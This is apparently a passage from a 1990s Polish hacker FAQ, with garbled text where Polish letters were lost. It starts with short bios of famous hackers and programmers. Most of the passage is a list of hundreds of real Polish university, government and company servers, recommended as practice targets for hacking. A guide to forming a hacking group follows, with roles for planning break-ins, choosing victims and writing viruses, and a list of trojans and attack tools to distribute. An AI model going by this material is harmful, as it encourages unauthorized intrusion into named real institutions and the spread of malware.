We wczesnych latach dziewidziesitych Torvalds zapisa si na zajcia z systemu Unix i jzyka C. Rok puxniej sam zacz tworrzy system na podobiestwo UNIX-a. Zosta on opublokowany w internecie pod nazw Linux. Dzi wok linuxa utworzyo si co w rodzaju kultu. Jest jedyny system w historii napisany przez niezalenych programistw z caego wiata -wielu z nich nigdy si nawet nie widziao. Linuxa nie chroni prawa autorskie w zakresie takim, jak w przypadku innych systemw operacyjnych i jest dostpny darmowo.

Bill Gates i Paul Allen
Ci panowie z waszyngtonu programowali od lat licealnych. Obaj posiadali ogromny talent. Zaczynaj w roku 1980, zbudowali najwiksze imperium programistyczne na kuli ziemskiej. Do komercyjnych osigni Microsoftu nale:MSDOS,Windows,Windows95 i WindowsNT.
                     NIKT ICH NIE LUBI:-)


Kevin Mitnic (MJ IDOL)
Mitnic znany jako Condor, to chyba najsynniejszy haker/cracker/phreaker wiata. Karier zacz jako phreaker. Od tamtych lat udao mu si wama do najbardziej zabezpieczonych serwerw, a w tym komputerw wojskowych, korporacji finansowych, firm programistycznych itd. (Ju jakio nastolatek wama si do Dowdztwa Pnocnoamerykaskiej Obrony lotniczej).
P.S W tym faq jest (na pocztku) may tekst o Mitnicku


Kevin Poulsen
Idcy w lady Mitnika Poulsen zasyn z czynu graniczcego z czarn magi: przejcia kontroli nad systemem telefonicznym Pacific Bell. Pewnego razu dziki swym umiejtnoci "wygra" konkurs radiowy, w ktrym gwn nagrod stanowio Porsche. Zrobi tak eby to wanie jego telefon wygra. On rwnie wamywa si do jarozmaitrzych werwerw, ale najbardziej upodoba sobie te zawierajce informacje dotyczce obrony narodowej. Pi lat spdzi w wizieniu. Wyszed na wolno w 1996 roku

Justin Tanner Peterson

Znany jako agent zodziej (Agent Steal), Peterson zasyn z wamania do instytucji przydzielajcej kredyty konsumenckie. Po zapaniu wsypa swoich znajomych, midzy innymi Kevina Poulsena. Nastpnie tajnie pracowa dla FBI. Dziki temu udao mu si wyj na wolno-ale uciek od pracy tajnego agenta i znw zacz rozrabia. Ostatnim wyczynem bya nieudana proba dokonania przez INTERNET faszywej transakcji opiewajcej na setki tysicy dolarw
*********************************************************************
Dodatek specjalny - lista serwerow uczelnianych i edukacyjnych (idealne do nauki hacku):

WWW.BIALAP.TPSA.PL
BISON.ZBS.BIALOWIEZA.PL
WWW.UW.BIALYSTOK.PL
MATH.UW.BIALYSTOK.PL
WWW.MERINOSOFT.BPTNET.PL
MIZAR.UW.BIALYSTOK.PL
EUREKA.MTRAIN.OPTINET.PL
WWW.NASK.BIALYSTOK.PL
WWW.OPTINET.PL
CKSR.AC.BIALYSTOK.PL
ARAGORN.PB.BIALYSTOK.PL
LIBRA.PB.BIALYSTOK.PL
WWW.SITECH.PL
WWW.T-MATIC.BPTNET.PL
KPBM.PB.BIELSKO.PL
WWW.BESKIDY.POL.PL
WWW.BIELBIT.BIELSKO.PL
WWW.FFCOMP.COM.PL
WWW.PETEX.BIELSKO.PL
WWW.BIELSKO.TPSA.PL
WWW.TECHMEX.COM.PL
KPBM.PB.BIELSKO.PL
WWW.BIELSKO.TPSA.PL
WWW.OKOCIM.COMNET.PL
WWW.ATR.BYDGOSZCZ.PL
ROLN.ATR.BYDGOSZCZ.PL
CHSERV.ATR.BYDGOSZCZ.PL
WWW.BP.COM.PL
WWW.PPCOR.ORG.PL
WWW.CHEMNET.COM.PL
WWW.INTERLAN.COM.PL
WWW.LOGON.BYDGOSZCZ.PL
WWW.LOGONET.COM.PL
WWW.BYDG.PDI.NET
WWW.POCZTA-POLSKA.PL
WWW.RPL.COM.PL
WWW.ALJGLOBAL.COM
WWW.STUDIO-NET.COM.PL
WWW.TELMAX.COM.PL
WWW.BYD.TOP.PL
WWW.ZSE.BYDGOSZCZ.PL
WWW.ZST.BYTOM.PL
USCTOUX1.CTO.US.EDU.PL
WWW.ZST.BYTOM.PL
WWW.ATA.COM.PL
WWW.FILUS.EDU.PL
WWW.GORZOW.PL
WWW.KAM.PL
WWW.SHACO.PL
IS.PCZ.CZEST.PL
WWW.MIM.PCZ.CZEST.PL
KTMIAP.PCZ.CZEST.PL
WWW.WINEASY.SE
WWW.MATINF.PCZ.CZEST.PL
WWW.ZETO.CZEST.PL
WWW.GDA.CNT.PL
WWW.BMBG.COM.PL
WWW.CNT.PL
WWW.ATM.COM.PL
WWW.PG.GDA.PL
WWW.ELY.PG.GDA.PL
WWW.ETI.PG.GDA.PL
WWW.DS2.PG.GDA.PL
WWW.INFOSERVICE.COM.PL
WWW.ITNET.COM.PL
WWW.AMG.GDA.PL
WWW.IPIPAN.GDA.PL
WWW.IMP.PG.GDA.PL
WWW.IBWPAN.GDA.PL
WWW.NEXUS.OPTIMUS.COM.PL
WWW.GDANSK.SPRINT.PL
WWW.TASK.GDA.PL
WWW.BG.UNIV.GDA.PL
WWW.UNIV.GDA.PL
WWW.USE.COM.PL
TRYTON.CBMPAN.GDYNIA.PL
WWW.MIASTO.GDYNIA.PL
WWW.IMMT.GDYNIA.PL
WWW.IMGW.GDYNIA.PL
WWW.WSM.GDYNIA.PL
WWW.KASZUB.TOP.PL
WWW.SOPOT-PL.NET
WWW.IOPAN.GDA.PL
WWW.POLSL.GLIWICE.PL
WWW.I3W.PIK-NET.PL
WWW.GSW.PL
WWW.SILESIA.PIK-NET.PL
WWW.HELION.COM.PL
ATOS.IITIS.GLIWICE.PL
WWW.JM.COM.PL
KOLIBER.IA.POLSL.GLIWICE.PL
WWW.OPUS.COM.PL
WWW.PIK.GLIWICE.PL
WWW.PIK-NET.GLIWICE.PL
WWW.SILESIA.PIK-NET.PL
WWW.SWOC.GLIWICE.PL
WWW.POLSL.GLIWICE.PL
WWW.TAGOR.COM.PL
HEL.HEL.UNIV.GDA.PL
WWW.PWR.JGORA.PL
WWW.CPU-ZETO.COM.PL
WWW.JELENIAG.TPSA.PL
WWW.AE.KATOWICE.PL
WWW.ADAP.COM.PL
WWW.BIT.KATOWICE.PL
WWW.CENTROZAP.COM.PL
WWW.EMAG.KATOWICE.PL
WWW.FRAM-EFY.COM.PL
WWW.GIG.KATOWICE.PL
ALF.IGO.KATOWICE.PL
WWW.KSK.COM.PL
WWW.NETKAT.COM.PL
WWW.GAPP.PL
WWW.KATOWICE.PIK-NET.PL
WWW.PIK-NET.PL
WWW.KATOWICE.TPSA.PL
WWW.CTO.US.EDU.PL
WWW.ADM.US.EDU.PL
WWW.CTO.US.EDU.PL
WWW.MATH.US.EDU.PL
GATE.MATH2.US.EDU.PL
WWW.SLAM.KATOWICE.PL
WWW.BONUS.COM.PL
WWW.COMPLEX.COM.PL
WWW.EXBUD.COM.PL
WWW.PU.KIELCE.PL
KIEL1.COMPLEX.COM.PL
WWW.SLOWOLUDU.COM.PL
WWW.TU.KIELCE.PL
WWW.KIELCE.TPSA.PL
WWW.ALPLAST.COM.PL
WWW.TEAM.COM.PL
WWW.CYF-KR.EDU.PL
WWW.V-LO.KRAKOW.PL
WWW.ABBPOL.KRAKOW.PL
WWW.CYF-KR.EDU.PL
WWW.ROL.AR.KRAKOW.PL
WWW.ZOO.AR.KRAKOW.PL
WWW.AE.KRAKOW.PL
FETC.AE.KRAKOW.PL
WWW.ALTKOM.KRAKOW.PL
DINO.BCI.KRAKOW.PL
WWW.BJSYSTEM.COM.PL
WWW.BUDOSTAL-2.KRAKOW.PL
WWW.BCI.KRAKOW.PL
WWW.BCI.KRAKOW.PL
WWW.CLICO.KRAKOW.PL
WWW.COMMPOL.KRAKOW.PL
WWW.DIJ.KRAKOW.PL
WWW.EURO.NET.PL
WWW.FEMA.KRAKOW.PL
WWW.HORYZONT-KPG.COM.PL
WWW.IFJ.EDU.PL
WWW.ISPID.COM.PL
WWW.IP.KRAKOW.PL
WWW.IF.UJ.EDU.PL
WWW.OA.UJ.EDU.PL
WWW.CH.UJ.EDU.PL
WWW.LAW.UJ.EDU.PL
TH-WWW.IF.UJ.EDU.PL
WWW.II.UJ.EDU.PL
WWW.BJ.UJ.EDU.PL
TICHY.CH.UJ.EDU.PL
DRUID.IF.UJ.EDU.PL
ZFS.IF.UJ.EDU.PL
WWW.TL.KRAKOW.PL
WWW.KKI.KRAKOW.PL
WWW.MODULUS.COM.PL
WWW.MULTISOFT.KRAKOW.PL
WWW.NAFTOBUDOWA.IPL.NET
WWW.IGNG.KRAKOW.PL
WWW.ONET.PL
WWW.TPG.KRAKOW.PL
WWW.ABA.KRAKOW.PL
WWW.PROVEST.COM.PL
WWW.RMF.PL
WWW.RADIOPLUS.COM.PL
WWW.SOLIDEX.COM.PL
STUDENT.UCI.AGH.EDU.PL
WWW.S3000.KRAKOW.PL
WWW.TRANSPROJEKT.KRAKOW.PL
RAK.UCI.AGH.EDU.PL
WWW.KT.AGH.EDU.PL
WWW.FTJ.AGH.EDU.PL
WWW.KWESTURA.AGH.EDU.PL
WWW.PK.EDU.PL
SUN1.WIL.PK.EDU.PL
EDISON3.EDISON.PK.EDU.PL
WWW.PK.EDU.PL
WWW.CHEMIA.PK.EDU.PL
WWW.TWINS.PK.EDU.PL
LIMBA.WIL.PK.EDU.PL
WWW.WSP.KRAKOW.PL
WWW.KRASNIK.PL
WWW.CIEG.COM.PL
WWW.MAN.LODZ.PL
WWW.ABIS.LODZ.PL
WWW.APRONET.LODZ.PL
WWW.CKZETO.COM.PL
WWW.UML.LODZ.PL
WWW.COMPART.LODZ.PL
WWW.PARTNER.LODZ.PL
WWW.DOSKOMP.LODZ.PL
JUMBO.ERICPOL.LODZ.PL
WWW.EFL.LODZ.PL
WWW.FAST.COM.PL
WWW.GEOSOFT.LODZ.PL
WWW.POCZTA.COM
WWW.JMK.LODZ.PL
WWW.LASER.COM.PL
WWW.LOOP.LODZ.PL
WWW.MAGANN.COM.PL
WWW.MAGNUM.LODZ.PL
WWW.AM.LODZ.PL
WWW.MAN.LODZ.PL
WWW.OPEL-RYGALIK.LODZ.PL
WWW.ORTEX.LODZ.PL
WWW.PACTOR.TPNET.PL
WWW.LODZ.PDI.NET
WWW.PLYTOLEX.COM.PL
WWW.SALTEX.LODZ.PL
WWW.STYLGRAF.LODZ.PL
WWW.UNI.LODZ.PL
IMUL.UNI.LODZ.PL
WWW.P.LODZ.PL
ZSKU.P.LODZ.PL
MITRHP.P.LODZ.PL
ZMW1.P.LODZ.PL
PKM1.P.LODZ.PL
WWW.P.LODZ.PL
WWW.CUPRUM.COM.PL
WWW.LUBLIN.PL
WWW.UMCS.LUBLIN.PL
ZIOPC29.UMCS.LUBLIN.PL
HEBE.UMCS.LUBLIN.PL
INDY.UMCS.LUBLIN.PL
WWW.POL.LUBLIN.PL
VOLT.POL.LUBLIN.PL
WWW.POL.LUBLIN.PL
JANTAR.ZSEL.LUBLIN.PL
WWW.TNET.PL
WWW.ART.OLSZTYN.PL
WWW.ART.OLSZTYN.PL
WWW.INFONET.COM.PL
WWW.MAZURY.TOP.PL
WWW.CSO.OPTINET.PL
WWW.RO.COM.PL
WWW.UM.OPOLE.PL
WWW.INTERMIK.TPNET.PL
WWW.UNI.OPOLE.PL
MATH.UNI.OPOLE.PL
WWW.RADIO.OPOLE.PL
WWW.WSI.OPOLE.PL
WWW.OPOLE.TPSA.PL
WWW.MIKO.PILA.PL
WWW.TPNET.PL
WWW.ENERGIA2000.ORG.PL
WWW.ZSZ-PLESZEW.KALISZ.PL
WWW.PLOCMAN.PL
WWW.CS.PUT.POZNAN.PL
WWW.AMU.EDU.PL
WWW.ASTRO.AMU.EDU.PL
WWW.MAN.POZNAN.PL
SWAN.AU.POZNAN.PL
WWW.CADENA.COM.PL
WWW.ENERGETYKA.POZN.COM
AMPAT.AMU.EDU.PL
WWW.ML.USOMS.POZNAN.PL
WWW.TUP.EDU.PL
RUBY.POZ.EDU.PL
WWW.PUT.POZNAN.PL
RUBY.POZ.EDU.PL
WWW.MT.PUT.POZNAN.PL
WWW.CS.PUT.POZNAN.PL
WWW.ET.PUT.POZNAN.PL
WWW.PUT.POZNAN.PL
WWW.ML.PUT.POZNAN.PL
WWW.HSTL6.PUT.POZNAN.PL
WWW.PROTEL.POZNAN.PL
WWW.RADIO-MERKURY.POZNAN.PL
WWW.POZMAN.EDU.PL
WWW.SYLABA.POZNAN.PL
WWW.POZNAN.TPSA.PL
WWW.EFP.POZNAN.PL
WWW.AE.POZNAN.PL
WWW.INTERNET-INFO.COM.PL
WWW.CZART.PULAWY.PL
WWW.IUNG.PULAWY.PL
WWW.PIWET.PULAWY.PL
WWW.ZEW.COM.PL
WWW.PULSAR.COM.PL
WWW.RADOM.TOP.PL
WWW.WSRP.SIEDLCE.PL
WWW.SLUPSK.PL
WWW.BICOM.SLUPSK.PL
WWW.WSP.SLUPSK.PL
WWW.PLT.EDU.PL
WWW.BICOM.SLUPSK.PL
GIELDA-SAM.SLUPSK.PL
WWW.GROT.COM.PL
WWW.GROT.COM.PL
LINSTAR.ZSZ2.STARACHOWICE.PL
WWW.SUWALKI.TPSA.PL
WWW.SZCZECIN.PL
WWW.EKON.AR.SZCZECIN.PL
WWW.INET.COM.PL
WWW.POCKET.COM.PL
WWW.PBKS.PL
WWW.TUNIV.SZCZECIN.PL
ARCADIA.TUNIV.SZCZECIN.PL
PLASTIC.TUNIV.SZCZECIN.PL
WWW.SZCZECIN.TPSA.PL
WWW.UBIQUE.COM.PL
WWW.UM.SZCZECIN.PL
WWW.TARNOBRZEG.TPSA.PL
WWW.I-LO.TARNOW.PL
WWW.IQNET.TARNOW.PL
WWW.WIOS.TARNOW.PL
WWW.TCIG.TARNOW.PL
MAIN.TOI.TARNOW.PL
WWW.UMT.TARNOW.IPL.NET
WSB.TOI.TARNOW.PL
WWW.ZETOSA.COM.PL
WWW.MAN.TORUN.PL
WWW.LOIV.TORUN.PL
WWW.XLO.TORUN.PL
WWW.ANKO.TORUN.PL
WWW.APATOR.TORUN.PL
WWW.PEC.TORUN.PL
WWW.GEOFIZYKA.TORUN.PL
WWW.INFOCOMP.TORUN.PL
LX.INFOMARKET.TORUN.PL
WWW.MALICKI-SG.TORUN.PL
WWW.NKJO.TORUN.PL
WWW.NCAC.TORUN.PL
WWW.CC.UNI.TORUN.PL
ALEX.BOA.UNI.TORUN.PL
CHEM.UNI.TORUN.PL
WWW.MAT.UNI.TORUN.PL
WWW.PHYS.UNI.TORUN.PL
WWW.PHYS.UNI.TORUN.PL
WWW.ASTRI.UNI.TORUN.PL
ERIS.PHYS.UNI.TORUN.PL
WWW.ASTRO.UNI.TORUN.PL
WWW.BIOL.UNI.TORUN.PL
WWW.PED.UNI.TORUN.PL
DWZ.RECT.UNI.TORUN.PL
WWW.TELEM.UNI.TORUN.PL
WWW.BOA.UNI.TORUN.PL
WWW.BU.UNI.TORUN.PL
WWW.TORUN.PDI.NET
WWW.MAN.TORUN.PL
WWW.TORUN.TPSA.PL
WWW.VINPOL.TORUN.PL
ZI.OSA.TORUN.PL
WWW.TAB-TRONIK.TELBANK.PL
SUNSITE.ICM.EDU.PL
WWW.ABCDATA.COM.PL
WWW.ABC-DC.COM.PL
WWW.CONTACT.WAW.PL
WWW.AGSMEDIA.COM.PL
VENUS.CI.UW.EDU.PL
WWW.PIP.COM.PL
WWW.ALTKOM.COM.PL
WWW.WONET.COM.PL
WWW.PROMISE.COM.PL
WWW.APPLE.COM.PL
ARCHIE.ICM.EDU.PL
WWW.MEDIANET.COM.PL
WWW.ATM.COM.PL
WWW.TELBANK.PL
WWW.BIZ.NET.PL
WWW.BMB.COM.PL
WWW.BOTAR.COM.PL
WWW.BRE-IB.COM.PL
WWW.BUSINESSMAN.COM.PL
WWW.IT.COM.PL
WWW.ATM.COM.PL
CEENET.NASK.ORG.PL
WWW.CIOP.WAW.PL
SUNSITE.ICM.EDU.PL
WWW.OEIIZK.WAW.PL
CIS.ORG.PL
CIS.ORG.PL
WWW.COMMED.PL
WWW.KBN.GOV.PL
WWW.COMNET.PL
WWW.COMP.WAW.PL
WWW.CSBI.WAW.PL
WWW.COFUND.ORG.PL
WWW.DAEWOO.COM.PL
WWW.DATACOM.COM.PL
WWW.DMBOS.COM.PL
WWW.UNIVCOMP.WAW.PL
WWW.ATM.COM.PL
WWW.BRE-IB.COM.PL
WWW.FONTEX.COM.PL
WWW.GAZETA.PL
WWW.GIGA.COM.PL
WWW.URM.GOV.PL
WWW.GRATIS.WAW.PL
WWW.HSN.COM.PL
WWW.PL.IBM.COM
WWW.DOBRESTRONY.COM.PL
INFOSEEK.ICM.EDU.PL
WWW.ITE.WAW.PL
WWW.ORGMASZ.WAW.PL
WWW.IPS.UW.EDU.PL
WWW.IL.WAW.PL
WWW.INTER.NET.PL
WWW.SECURITIES.COM.PL
WWW.ISP.COM.PL
WWW.IT.COM.PL
IDSSERV.WAW.IDS.EDU.PL
WWW.KNOLL.COM.PL
WWW.KSAP.WAW.PL
WWW.LUMENA.WAW.PL
WWW.MACROSOFT.WAW.PL
WWW.MEDIANET.COM.PL
WWW.ATM.COM.PL
WWW.MIT.GOV.PL
WWW.MSP.WAW.PL
WWW.MUSIC4U.COM.PL
WWW.NSC.NET.PL
NETFIND.ICM.EDU.PL
WWW.NFOSIGW.GOV.PL
WWW.NOVELL.COM.PL
WWW.OC.WAW.PL
WWW.OPTIMEDIA.COM.PL
WWW.OPTIMUM-MEDIA.COM.PL
WWW.OPTIMUS.WAW.PL
WWW.ORACLE.COM.PL
WWW.PAGI.PL
WWW.SEJM.GOV.PL
WWW.WAW.PDI.NET
WWW.PERYTNET.PL
WWW.POL.PL
WWW.POLBOX.COM.PL
WWW.PAIZ.GOV.PL
WWW.PSL.ORG.PL
WWW.PERYT.WAW.PL
WWW.PMC.COM.PL
ATOS.PSYCHPAN.WAW.PL
WWW.IBB.WAW.PL
WWW.IBIB.WAW.PL
WWW.IPIPAN.WAW.PL
INFO.IPPT.GOV.PL
YOGI.IPPT.GOV.PL
INFO.IGF.EDU.PL
WWW.IMPAN.GOV.PL
WWW.ICHF.EDU.PL
INFO.IFPAN.EDU.PL
WWW.NENCKI.GOV.PL
WWW.CAMK.EDU.PL
WWW.IBSPAN.WAW.PL
WWW.PGI.WAW.PL
WWW.PAP.WAW.PL
WWW.TVP.COM.PL
WWW.RADIO.COM.PL
WWW.RADIO.COM.PL
WWW.PSL.ORG.PL
WWW.POLSPARK.WAW.PL
WWW.PAGI.PL
WWW.PIAP.WAW.PL
WWW.PUBLICIS.COM.PL
WWW.QDNET.PL
WWW.XEROX.COM.PL
WWW.RANGELSOFT.COM
WWW.NASK.ORG.PL
TROLL.NASK.ORG.PL
WWW.SCIENTIFIC.COM.PL
WWW.SENAT.GOV.PL
WWW.SIMPLE.COM.PL
WWW.SOLIDEX.WAW.PL
INDIA.CYF.GOV.PL
SUNSITE.ICM.EDU.PL
WWW.SE.COM.PL
WWW.TCH.WAW.PL
WWW.NASK.ORG.PL
WWW.TG.COM.PL
WWW.WSUB.WAW.PL
WWW.UNIV.WAW.PL
WWW.ATM.COM.PL
SNSINFO.IFPAN.EDU.PL
WWW.SGGW.WAW.PL
WWW-RAK.SGGW.WAW.PL
WWW.WARMAN.ORG.PL
WWW.SGH.WAW.PL
WWW.PW.EDU.PL
WWW.ELKA.PW.EDU.PL
WWW.RIVIERA.PW.EDU.PL
BUBA.RIVIERA.PW.EDU.PL
WWW.CH.PW.EDU.PL
WWW.IEM.PW.EDU.PL
WWW.ICHIP.PW.EDU.PL
WWW.IL.PW.EDU.PL
WWW.ELKA.PW.EDU.PL
WWW.MEIL.PW.EDU.PL
OGG.II.PW.EDU.PL
IAIR.MP.PW.EDU.PL
WWW.IA.PW.EDU.PL
WWW.IF.PW.EDU.PL
VOLCANO.II.PW.EDU.PL
WWW.IPE.PW.EDU.PL
WWW.IIS.PW.EDU.PL
WWW.ITC.PW.EDU.PL
WWW.IM.PW.EDU.PL
WWW.IMIO.PW.EDU.PL
WWW.IRE.PW.EDU.PL
WWW.TELE.PW.EDU.PL
WWW.IT.PW.EDU.PL
WWW.BG.PW.EDU.PL
WWW.AMP.PW.EDU.PL
SP5PBE.RIVIERA.PW.EDU.PL
WWW.MEIL.PW.EDU.PL
WWW.IT.PW.EDU.PL
WWW.ASTROUW.EDU.PL
WWW.BOT.ASTROUW.EDU.PL
WWW.BOT.ASTROUW.EDU.PL
WWW.CHEM.UW.EDU.PL
PYTHON.CHEM.UW.EDU.PL
CIESIN.CI.UW.EDU.PL
MERCURY.CI.UW.EDU.PL
ZAA.MIMUW.EDU.PL
GRAB.MIMUW.EDU.PL
BULL.MIMUW.EDU.PL
ELEET.MIMUW.EDU.PL
HYDRA.MIMUW.EDU.PL
ALFA.MIMUW.EDU.PL
WWW.MIMUW.EDU.PL
ZLS.MIMUW.EDU.PL
ANDANTE.ISS.UW.EDU.PL
WWW.ICM.EDU.PL
PUMA.WZ.UW.EDU.PL
INFO.FUW.EDU.PL
SUNSOL.FUW.EDU.PL
148.81.145.21
WWW.WEBTRAVEL.COM.PL
WWWTECH.NET.PL
WWW.ZIGZAG.PL
WWW.REMUS.TOP.PL
ZSBIKMW.ZSBIKMW.WLOCL.PL
WWW.PWR.WROC.PL
WWW.KONGRES.WROC.PL
WWW.AE.WROC.PL
KSK-2.IIE.AE.WROC.PL
ETCETERA.IIE.AE.WROC.PL
MANAGER.AE.WROC.PL
WWW.AR.WROC.PL
WWW.AR.WROC.PL
OZI.AR.WROC.PL
WWW.GEO.AR.WROC.PL
BGAR.AR.WROC.PL
WWW.AWF.WROC.PL
WWW.CADBURY.COM.PL
WWW.ZALBIX.WROC.PL
WWW.EMIT.COM.PL
WWW.EFL.COM.PL
WWW.ORPHA.COM.PL
WWW.INCOM.WROC.PL
WWW.INFONET.WROC.PL
WWW.IASE.WROC.PL
WWW.IDS.UNI.WROC.PL
WWW.LMG.COM
WWW.MIKROZET.WROC.PL
WWW.NETSERVICE.COM.PL
IMMUNO.PAN.WROC.PL
WWW.INT.PAN.WROC.PL
WWW.POLMAX.COM.PL
WWW.UWOJ.WROC.PL
WWW.PWR.WROC.PL
SUN20.AC.PWR.WROC.PL
WWW.CI.PWR.WROC.PL
ALICJA.CI.PWR.WROC.PL
WWW.ARCH.PWR.WROC.PL
WWW.IIC.PWR.WROC.PL
WWW.ISTS.PWR.WROC.PL
WWW.IPEE.PWR.WROC.PL
WWW.ICT.PWR.WROC.PL
DIUNA.ICT.PWR.WROC.PL
WWW.IOZ.PWR.WROC.PL
WWW.IMMT.PWR.WROC.PL
WWW.IM.PWR.WROC.PL
WWW.CH.PWR.WROC.PL
IBM1.CH.PWR.WROC.PL
WWW.ITA.PWR.WROC.PL
WWW.BG.PWR.WROC.PL
WWW.WRO.TOP.PL
WWW.TETA.COM.PL
WWW.REJ.COM.PL
WWW.ASTRO.UNI.WROC.PL
WWW.CHEM.UNI.WROC.PL
WWW.II.UNI.WROC.PL
TEMPUS.II.UNI.WROC.PL
WWW.IFD.UNI.WROC.PL
WWW.MATH.UNI.WROC.PL
WWW.IFT.UNI.WROC.PL
WWW.BU.UNI.WROC.PL
WWW.PROREXIM.COM.PL
ZDO.WSSK.AM.WROC.PL
WWW.WCSS.WROC.PL
WWW.DOM.ZABRZE.PL
WWW.POWEN.ZABRZE.PL
WWW.PROGRES.ZABRZE.PL
WWW.ZAMOSC.POL.PL
WWW.LO4ZG.BPTNET.PL
WWW.MAX.COM.PL
WWW.WSP.ZGORA.PL
WWW.ZGORA.PL
WWW.IRIO.WSI.ZGORA.PL
WWW.IIE.WSI.ZGORA.PL
MAX.COM.PL
WWW.WSP.ZGORA.PL
WWW.WIMBP.ZGORA.PL
WWW.WBIS.WSI.ZGORA.PL
WWW.VICNET.NET.AU
LASERSPARK.ANU.EDU.AU
WWW.YUCC.YORKU.CA
FTN.NET
WWW.CAM.ORG
WWW.HUSARZ.COM
WWW.POLISH-BUS.COM
WWW.CAM.ORG
WWW.INFOPOL.COM
WWW.NETCOMTECH.MB.CA
WEB.ARCOS.ORG
WWW.POL-NET.COM
WWW.IONSYS.COM
VALIS.WORLDGATE.EDMONTON.AB.CA
WWW.EXECULINK.COM
WWW.NATALIA.COM
WWW.CAMPUSLIFE.UTORONTO.CA
WWW.MGL.CA
192.216.191.91
WWW.POLONIANET.COM
WWW.POLONIA-ONLINE.COM
OURWORLD.COMPUSERVE.COM
WWW.WATER-AND-FIRE.COM
WWW.PC-NOTRUF.DE
WWW.IS.IN-BERLIN.DE
WWW.INTERNET.GR
WWW2.GOL.COM
WWW.POLONIA.NL
HUIZEN.DDS.NL
WWW.IDG.NO
KPT.TELE.NTNU.NO
WWW.ALGONET.SE
WWW.NADA.KTH.SE
WWW.STRATH.AC.UK
WWW.ZEM.CO.UK
WWW.POLISHBUSINESS.CO.UK
SUN1.BHAM.AC.UK
WWW.INTAC.COM
WWW.BIZNET1.COM
WWW.CYBERDUDE.NET
WWW.MICROGRAFX.COM
WWW.PAN.NET
WWW.IDSONLINE.COM
WWW.ISISNET.COM
PONIECKI.BERKELEY.EDU
WWW.WWDIR.COM
WWW.WWDIR.COM
WWW.POLYEKO.COM
WWW.GEOCITIES.COM
WWW.GEOCITIES.COM
WWW.CENTRALEUROPE.COM
WWW.DNAI.COM
WWW.CONNACTIVITY.COM
WWW.POLHOME.COM
WWW.INGLOT.COM
WWW.POLISHPAGES.COM
BERNIANN.CLEVER.NET
WWW.NETPOL.COM
WWW.POLMART.COM
WWW.VIPROFIX.COM
WWW.WTINET.COM
WWW.EUROPOL.COM
WWW.BCONN.COM
WWW.MHV.NET
WWW.PERFEKT.NET
WWW.POLAND.NET
WWW.POLAND-BIZ.NET
WWW.SCN.ORG
WALDEN.MO.NET
WWW.W3.ORG
*********************************************************************


DODATEK SPECJALNY - Jak zaoy grupe hackersk, aby si nie rozpada

Na caym wiecie jest, byo i bdzie wiele grup hackerskich.
Niektre z nich przetrway do dzi i nadal s aktywne, inne rozpady si z rnych powodw.
Jestem pewien, e gdy zaczynae "nauke" hacku, zastanawiae si czy by sam, czy w grupie...
W tym dodatku do FAQ chciabym wyjani kilka spraw zwizanych z grupami, ich organizacj, hierarchi itp.
Plusy i minusy bycia samemu i w grupie:

HACKOWANIE SAMEMU:
Plusy:
 + Wszystko idzie po twojej myi, nikt ci si nie sprzeciwia
 + Robisz mniej szumu wok caego wamu
 + Szybciej staniesz si sawnym hackerem
Minusy:
 - Mona atwiej wpa...
 - W razie problemw nikt ci nie pomoe
 - Jeden atak moe trwa wieki, bo wszystko bdziesz musia zrobi sam...

HACKOWANIE W GRUPIE:
Plusy:
 + Masz mniej pracy (praca jest podzielona, ty odpowiadasz tylko za swoj cz)
 + Mniejsze ryzyko wpadki i kary (nikt nie zamknie [jesli grupa jest ogromna] 100 ludzi do wiezienia !!!)
 + Wikszy rozgos (grupy s sawniejsze od pojedyczych hackerw)
 + Bdc w grupie nie bdziesz si nudzi (zawsze wykombinujecie jaki cel do shackowania...)
Minusy:
 - Grupa moe si rozpa z powodu zej organizacji
 - Mog pojawi si sprzeczki...
 - Wicej ludzi, wicej kopotw...

Teraz ju sam podejmij decyzje, czy lepiej jest by samemu, czy w grupie...

ORGANIZACJA GRUPY:

1.Na pocztek grupa powinna skada si z kilku znajomych/przyjaci (nie wicej ni 3-4 osoby)
2.Podzielcie midzy siebie funkcje:
  * Szef (przyjmowanie nowych czonkw do grupy, ustalanie reg grupy, pomaganie innym itp.)
  * Programista (programy, wirusy, trojany, ziny, exploity, WWW itp.)
  * Cracker (pisanie crackw, patchw i szukanie luk w programach)
  * Gwny Hacker (planowanie wamw, szukanie ofiar, zbieranie exploitw itp.)
3.Wasz programista powinien przygotowa profesjonalnie wygldajc strone WWW na ktrej powinny znale si:
  * Informacje o was i waszej grupie (to co jakby reklama)
  * Informacje na temat jak (o ile chcecie) mona si do was przyczy
  * Adresy kontaktowe (najlepiej nie podawa swoich, lecz zaoy jeden email dla grupy)
  * Troche programw (jeli macie jednego wirusa, dwa trojany, lub co w tym stylu, to lepiej nie dajcie tego na WWW)
    + Trojany - powinny by tam (co najmniej):
      - Netbus 1.70/2.00
      - Hacker Paradais
      - CafeiNi
      - Danton
      - BackOffice
      - Hack'a'Tack
      - i kilka innych...
    + Wirusy (jakie nowe, i najlepiej kody rdowe, nie EXE, mog by generatory wirusw)
    + Stuff dla hackerw (ten najbardziej pospolity)
      - WWWhack
      - Webhacker
      - Winnuke (taki dla Win 95 i NT)
      - Skanery portw i IP
      - Generatory sownikw
      - John the Ripper (najnowszy)
      - Cain
      - i troszke innych znanych i czsto poszukiwanych programw
  * Troche tekstw:
      - Opisy programw hackerskich
      - Opisy trojanw (obsuga, instalacja i jak si ich pozby)
      - Duo FAQ (powinno si tam znale take wasze !!! [minimum 80 Kb - czystego TXT])
      - Wszystkie inne ZWIZANE Z HACKIEM TEKSTY
4.Zadbajcie, aby wasza strona miaa jaki fajny (czyt. mwicy o zawartoci) adres.
  Oto przykad ZEGO adresu:
  HTTP://WWW.NAJLEPSI.HACKERZY.POD.SOCEM.I.W.CAEJ.PRZESTRZENI.COM.PL
  Proponuje midzy WWW i COM/ORG/PL wstawi jakie proste sowo, atwe do zapamitania np.:
  - HACK
  - HACKERS
  - HACKER
  - HAKERZY
  - HACKERZY
  - HACK!
  - itp... (sami wymylcie)
  UWAGA: Pamitajcie, e jeeli grupa ma nazwe (musi mie !!!), to mona jej uy jako
         adresu WWW (a nawet trzeba !). Ale uwaga: jeli grupa nazywa si 
         "Zbiorowisko Kompletnie Pocztkujcych Hackerw", to nie dajemy adresu:
         WWW.Zbiorowisko_Kompletnie_Pocztkujcych_Hackerw.COM
         Lepiej da adres typu:
         WWW.ZKPH.COM (to jest skrt od pierwszych liter - jakby kto nie wiedzia...)
  Jeli nie sta was na swj serwer (na pewno was nie sta), moecie zaoy konto na
